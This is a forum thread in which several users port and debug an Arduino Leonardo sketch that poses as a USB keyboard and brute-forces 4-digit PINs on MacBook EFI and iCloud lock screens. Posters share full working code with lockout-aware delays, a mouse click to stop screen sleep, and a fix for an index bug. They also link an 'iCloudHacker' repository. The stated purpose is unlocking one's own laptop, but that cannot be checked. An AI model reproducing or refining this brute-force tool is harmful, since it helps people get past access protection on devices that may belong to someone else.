Translate Teensy Code into Arduino Uno R3 or Leonardo

void releaseKey()
{
buf[0] = 0;
buf[2] = 0;
buf[3] = 0;
Serial.write(buf, 8);	// Release key
}

What about but [1] ?

Hi janjte,

The model of the teesny is the 2.0+ or 3.0. I know that the UNO can't be used as HID. I follow this website to turn my uno r3 into HID http://mitchtech.net/arduino-usb-hid-keyboard/ but when i try it on notepad, it send only wwww and not number.
So this morning i shop a Leonardo card but i didn't watch it now.
Can you tell me where should be the problem ?

Thank you

Hi AWOL,

I make the correction and i will try this. I'll tell you if it works.

Thank you

what is wrong?
First of all it looks like you are trying to write a hacking program entering pin codes on one or another program.
secondly

AWOL:

if (buf[3] = 30)

Always true.
Oh dear.

Due to 1 I will not comment any more unless you give a really good explanation what this project of yours is about.

jantje

Hi janjte,
As you say it's a bruteforce: http://orvtech.com/en/howto/atacar-efi-pin-macbook-pro/
My Macbook air crashed last week and when i try to clear it, it ask me a code. I called Apple and they told me that my warranty is over (i bought my mac in 2011). So they ask me 150 euros for send a key but i said them that i never did this code. So i am stuck. I buy an other macbook pro friday because i need a computer for school and my macbook air is too old :stuck_out_tongue:

So that's all. I buy the starter kit for arduino last week because i will start my project for school, an engeener project in embedded system. It talk about drones, and when i see the website of ovrtech, i though i could try to use his sketch into my R3. But if it doesn't work it's not a big deal, i'll just clear my session and create an other and sell my macbook like that.

Hi jantjte,

Can you explain me why this part of code is always true ?

if (buf[3] = 30)

Thank you

Because 30 is not zero.

khalilalucard:
Hi jantjte,

Can you explain me why this part of code is always true ?

if (buf[3] = 30)

Thank you

Because

if (buf[3] = 30)

works different then:

if (buf[3] == 30)

Lefty

Hi everybody,

Oh god it's clear that '=' is totaly different that '=='.
I will try this. I'll told you if it's works.

Thank you everybody.

Hi,

Finally it doesn't work. I think this will not work, because when i test it, I always have a random characters and not a counter of number (0, 1, 2 , ..., 9). Maybe the ATMEGA328P in the Arduino Uno is not working with this flash. I will try to do an other sketch with the Arduino Leonardo. I see into the arduino software a model of "keyboardandmouse" sketch so i will start with this. I'll post it when i'am finish.

Hope this will work :stuck_out_tongue:

Thank you buddies

I change some code and i make it work with a LEONARDO on icloud and notepad but dont work in efi. seems like virtual keyboard is not detected.
sorry for my bad english :frowning:

const int ledPin = 13; // choose the pin for the LED
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT); // declare LED as output
delay(10000);
}
void loop(){
if (counter <= 9999){
delay(8000);
digitalWrite(ledPin, LOW);
delay(5500);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
//sending first digit
Keyboard.press(pin[0]);
delay(450);
Keyboard.release(pin[0]);
delay(420);
//sending second digit
Keyboard.press(pin[1]);
delay(398);
Keyboard.release(pin[1]);
delay(510);
//sending third digit
Keyboard.press(pin[2]);
delay(421);
Keyboard.release(pin[2]);
delay(423);
//sending forth digit
Keyboard.press(pin[3]);
delay(430);
Keyboard.release(pin[3]);
delay(525);
//sending enter
Keyboard.press(KEY_RETURN);
delay(305);
Keyboard.release(KEY_RETURN);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
fakecounter = counter;
}

Dear evasoft,

I'm very happy to find your code.
Until now I used the Teensy 3.0 with succes for EFi and iCloud Pin...successfull means, that the code works, but until now I havn't find the code :frowning:

You're right, your code works finde with iCloud but not with EFi...

Did you try to install usbkeyboard and usbmouse function?

must be something like this: http://www.elektronik-labor.de/Arduino/KeyboardSerialDe.zip

#include "usToDE.h
#include <usb_keyboard.h
#include <usb_mouse.h

Can you install in your code/script working the Leonardo with a display hd48770 or 1602A?

Hi guys,

Just picked up my Leonardo today and exactly the same issue: Textedit and iCloud no probs but the EFI... nothing! :frowning:

Any advancements on this?

Many thanks

Hey all,

Just wanted to update you on some results from using the Leonardo for brute force unlocking of the iCloud passcode... well I had to play around with the code a little offered by orvtech. They provided the code which is designed for Teensy boards as follows:

#include <usb_keyboard.h>
const int ledPin = 13;
int counter = 0;
//waits for iCould
int loops = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
  pinMode(ledPin, OUTPUT);
  delay(30000);
}
void loop(){
  keyboard_modifier_keys = 0;
//lets wait 1 minute and 1 second
    if (loops == 5){
    delay(61000);
  } 
//lets wait 5 minutes and one second
    else if (loops == 6){
    delay(301000);
  }
//lets wait 15 minutes and 1 second
    else if (loops == 7){
    delay(901000);
    loops = 0;
  }
//lets get to work
  if (counter <= 9999){
    delay(1500);
    digitalWrite(ledPin, LOW);
    delay(800);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    Keyboard.press(pin[1]);
    delay(450);
    Keyboard.release(pin[1]);
    delay(420);
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    Keyboard.press(KEY_ENTER);
    delay(305);
    Keyboard.release(KEY_ENTER);
  }
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(6000);
  }
  ++counter;
  ++loops;
  fakecounter = counter;
}

So in order for this to work for Arduino, you have to modify the code a little by removing

  keyboard_modifier_keys = 0;

and modifying KEY_ENTER to KEY_RETURN

Keyboard.press(KEY_RETURN);
    delay(305);
    Keyboard.release(RETURN);

Once inserted into the Leonardo all was working well until the screen went into power save mode. It would throw off the counter sequence due, I believe, to the delay of bringing the screen live again.

To overcome this I introduced a 'mouse click' command just to get the screen live again which did the job just fine:

#include <usb_keyboard.h>
const int ledPin = 13;
int counter = 0;
//waits for iCloud
int loops = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
  pinMode(ledPin, OUTPUT);
  delay(30000);
  Mouse.begin();
}
void loop(){
//lets wait 1 minute and 1 second
    if (loops == 5){
    delay(61000);
  } 
//lets wait 5 minutes and one second
    else if (loops == 6){
    delay(301000);
  }
//lets wait 15 minutes and 1 second
    else if (loops == 7){
    delay(901000);
    loops = 0;
  }
//lets get to work
  if (counter <= 9999){
    delay(1500);
    digitalWrite(ledPin, LOW);
    Mouse.click();
    delay(800);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    Keyboard.press(pin[1]);
    delay(450);
    Keyboard.release(pin[1]);
    delay(420);
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    Keyboard.press(KEY_RETURN);
    delay(305);
    Keyboard.release(KEY_RETURN);
  }
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(6000);
  }
  ++counter;
  ++loops;
  fakecounter = counter;
}

Now a word of warning!
Make sure you keep your MacBook powered up at all times. My beloved wife... used the charger for her own MacBook but subsequently forgot to plug mine back in and the laptop died during the brute force hack. Now I am having to deal with a corrupted hard drive of which I have no backup for... its a good job divorce is not allowed in the Philippines!

I've tried taking a fresh hard drive with OSX installed but the MacBook won't boot from it (classic flashing question mark folder). I guess this is another Apple security measure in that the EFI is looking for a specific hard drive. I'd like to try brute forcing the EFI Password but still having the same problem where the MacBook does not appear to recognise the Leonardo HID.

If anyone has an ideas how I can get over this one then I'm all ears...

Bump

Anybody? To date, still found no resolve myself... =(

Tried your code with my Arduino Leonard and it started off well, but eventually stopped guessing and computer went to sleep.. Is buying a teensy the only solution? or can anyone else translate this code to Arduino?

https://github.com/knoy/iCloudHacker/blob/master/iCloudHacker.ino

This has worked for many people.

Happy to see people hacking their way around my script, I do not have anymore the laptop I was recovering nor I have an arduino leonardo. I could try to get it working (at least on paper) if I manage to secure one. Is the "arduino leonardo" the one most people here are working? any particular sub-model?

yixiy:
Hey all,

Just wanted to update you on some results from using the Leonardo for brute force unlocking of the iCloud passcode... well I had to play around with the code a little offered by orvtech. They provided the code which is designed for Teensy boards as follows:

#include <usb_keyboard.h>

const int ledPin = 13;
int counter = 0;
//waits for iCould
int loops = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
  pinMode(ledPin, OUTPUT);
  delay(30000);
}
void loop(){
  keyboard_modifier_keys = 0;
//lets wait 1 minute and 1 second
    if (loops == 5){
    delay(61000);
  }
//lets wait 5 minutes and one second
    else if (loops == 6){
    delay(301000);
  }
//lets wait 15 minutes and 1 second
    else if (loops == 7){
    delay(901000);
    loops = 0;
  }
//lets get to work
  if (counter <= 9999){
    delay(1500);
    digitalWrite(ledPin, LOW);
    delay(800);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    Keyboard.press(pin[1]);
    delay(450);
    Keyboard.release(pin[1]);
    delay(420);
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    Keyboard.press(KEY_ENTER);
    delay(305);
    Keyboard.release(KEY_ENTER);
  }
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(6000);
  }
  ++counter;
  ++loops;
  fakecounter = counter;
}




So in order for this to work for Arduino, you have to modify the code a little by removing



keyboard_modifier_keys = 0;




and modifying KEY_ENTER to KEY_RETURN



Keyboard.press(KEY_RETURN);
    delay(305);
    Keyboard.release(RETURN);




Once inserted into the Leonardo all was working well until the screen went into power save mode. It would throw off the counter sequence due, I believe, to the delay of bringing the screen live again.

To overcome this I introduced a 'mouse click' command just to get the screen live again which did the job just fine:



#include <usb_keyboard.h>
const int ledPin = 13;
int counter = 0;
//waits for iCloud
int loops = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
  pinMode(ledPin, OUTPUT);
  delay(30000);
  Mouse.begin();
}
void loop(){
//lets wait 1 minute and 1 second
    if (loops == 5){
    delay(61000);
  }
//lets wait 5 minutes and one second
    else if (loops == 6){
    delay(301000);
  }
//lets wait 15 minutes and 1 second
    else if (loops == 7){
    delay(901000);
    loops = 0;
  }
//lets get to work
  if (counter <= 9999){
    delay(1500);
    digitalWrite(ledPin, LOW);
    Mouse.click();
    delay(800);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    Keyboard.press(pin[1]);
    delay(450);
    Keyboard.release(pin[1]);
    delay(420);
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    Keyboard.press(KEY_RETURN);
    delay(305);
    Keyboard.release(KEY_RETURN);
  }
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(6000);
  }
  ++counter;
  ++loops;
  fakecounter = counter;
}




__**Now a word of warning!**__
Make sure you keep your MacBook powered up at all times. My beloved wife... used the charger for her own MacBook but subsequently forgot to plug mine back in and the laptop died during the brute force hack. Now I am having to deal with a corrupted hard drive of which I have no backup for... its a good job divorce is not allowed in the Philippines!

I've tried taking a fresh hard drive with OSX installed but the MacBook won't boot from it (classic flashing question mark folder). I guess this is another Apple security measure in that the EFI is looking for a specific hard drive. I'd like to try brute forcing the EFI Password but still having the same problem where the MacBook does not appear to recognise the Leonardo HID. 

If anyone has an ideas how I can get over this one then I'm all ears...

Can you define how long is "eventually"?

sarahthescampi:
Tried your code with my Arduino Leonard and it started off well, but eventually stopped guessing and computer went to sleep.. Is buying a teensy the only solution? or can anyone else translate this code to Arduino?

https://github.com/knoy/iCloudHacker/blob/master/iCloudHacker.ino

This has worked for many people.

You have typo, see, where you have this:

    Keyboard.press(pin[1]);
    delay(450);
    Keyboard.release(pin[1]);
    delay(420);
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);

it should be:

    Keyboard.press(pin[0]);
    delay(450);
    Keyboard.release(pin[0]);
    delay(420);
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);

yixiy:
Just wanted to update you on some results from using the Leonardo for brute force unlocking of the iCloud passcode... well I had to play around with the code a little offered by orvtech. They provided the code which is designed for Teensy boards as follows....